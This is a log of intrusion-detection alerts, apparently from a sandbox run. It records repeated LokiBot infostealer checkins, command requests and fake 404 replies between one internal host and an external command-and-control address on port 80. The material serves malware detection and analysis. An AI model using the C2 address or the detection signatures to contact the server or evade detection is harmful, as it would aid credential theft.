2024-10-27T08:50:31.109988+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:31.109988+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:31.110508+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49771	TCP
2024-10-27T08:50:31.270533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:31.270533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:31.270533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.248566+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.248566+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.254670+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49778	TCP
2024-10-27T08:50:32.403234+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:32.403234+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:32.403234+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.388049+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.388049+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.393935+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49784	TCP
2024-10-27T08:50:33.667352+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:33.667352+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:33.667352+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.847905+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.847905+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.848312+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49792	TCP
2024-10-27T08:50:34.995763+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:34.995763+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:34.995763+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:35.960696+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:35.960696+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:35.966327+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49798	TCP
2024-10-27T08:50:36.124868+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:36.124868+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:36.124868+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.083298+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.083298+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.088869+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49809	TCP
2024-10-27T08:50:37.232324+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:37.232324+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:37.232324+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.181996+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.181996+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.187703+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49815	TCP
2024-10-27T08:50:38.362776+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:38.362776+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:38.362776+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.332352+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.332352+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.341013+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49821	TCP
2024-10-27T08:50:39.488975+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:39.488975+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:39.488975+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.457308+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.457308+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.462994+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49829	TCP
2024-10-27T08:50:40.630175+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:40.630175+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:40.630175+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.617558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.617558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.623354+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49838	TCP
2024-10-27T08:50:41.777546+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:41.777546+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:41.777546+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:42.727221+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:42.727221+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:42.732921+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49844	TCP
2024-10-27T08:50:43.921773+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:43.921773+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:43.921773+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:44.891990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:44.891990+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:44.897635+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49850	TCP
2024-10-27T08:50:45.046731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:45.046731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:45.046731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.013060+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.013060+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.018781+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49861	TCP
2024-10-27T08:50:46.191642+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:46.191642+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:46.191642+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.147006+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.147006+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.152742+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49867	TCP
2024-10-27T08:50:47.330074+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:47.330074+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:47.330074+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.291817+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.291817+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.297660+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49873	TCP
2024-10-27T08:50:48.455794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:48.455794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:48.455794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.446252+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.446252+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.451834+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49882	TCP
2024-10-27T08:50:49.612677+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:49.612677+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:49.612677+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.557159+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.557159+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.562944+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49889	TCP
2024-10-27T08:50:50.713925+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:50.713925+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:50.713925+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.668504+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.668504+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.674467+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49895	TCP
2024-10-27T08:50:51.825406+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:51.825406+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:51.825406+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.780314+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.780314+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.785982+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49901	TCP
2024-10-27T08:50:52.946537+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:52.946537+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:52.946537+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:53.905837+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:53.905837+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:53.913693+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49912	TCP
2024-10-27T08:50:54.062937+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:54.062937+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:54.062937+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.022586+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.022586+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.028582+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49918	TCP
2024-10-27T08:50:55.183722+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:55.183722+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:55.183722+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.154424+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.154424+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.160155+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49924	TCP
2024-10-27T08:50:56.307813+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:56.307813+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:56.307813+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.274912+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.274912+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.280490+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49931	TCP
2024-10-27T08:50:57.446376+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:57.446376+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:57.446376+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.414985+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.414985+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.420622+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49940	TCP
2024-10-27T08:50:58.580399+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:58.580399+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:58.580399+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.543884+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.543884+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.549634+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49947	TCP
2024-10-27T08:50:59.707698+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:50:59.707698+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:50:59.707698+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:00.678058+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:00.678058+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:00.683946+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49953	TCP
2024-10-27T08:51:01.137133+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:01.137133+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:01.137133+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.093915+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.093915+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.099620+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49964	TCP
2024-10-27T08:51:02.266873+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:02.266873+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:02.266873+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.219814+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.219814+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.225409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49970	TCP
2024-10-27T08:51:03.602216+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:03.602216+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:03.602216+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.561746+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.561746+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.567369+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49976	TCP
2024-10-27T08:51:04.727181+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:04.727181+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:04.727181+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.696490+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.696490+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.702237+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49982	TCP
2024-10-27T08:51:05.865657+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:05.865657+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:05.865657+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.826417+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.826417+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.832174+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49992	TCP
2024-10-27T08:51:06.994667+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:06.994667+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:06.994667+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:07.969091+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:07.969091+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:07.974921+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49998	TCP
2024-10-27T08:51:08.135076+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:08.135076+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:08.135076+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.108310+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.108310+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.114213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50005	TCP
2024-10-27T08:51:09.286646+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:09.286646+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:09.286646+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.281408+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.281408+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.287090+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50015	TCP
2024-10-27T08:51:10.443346+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:10.443346+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50019	94.156.177.220	80	TCP
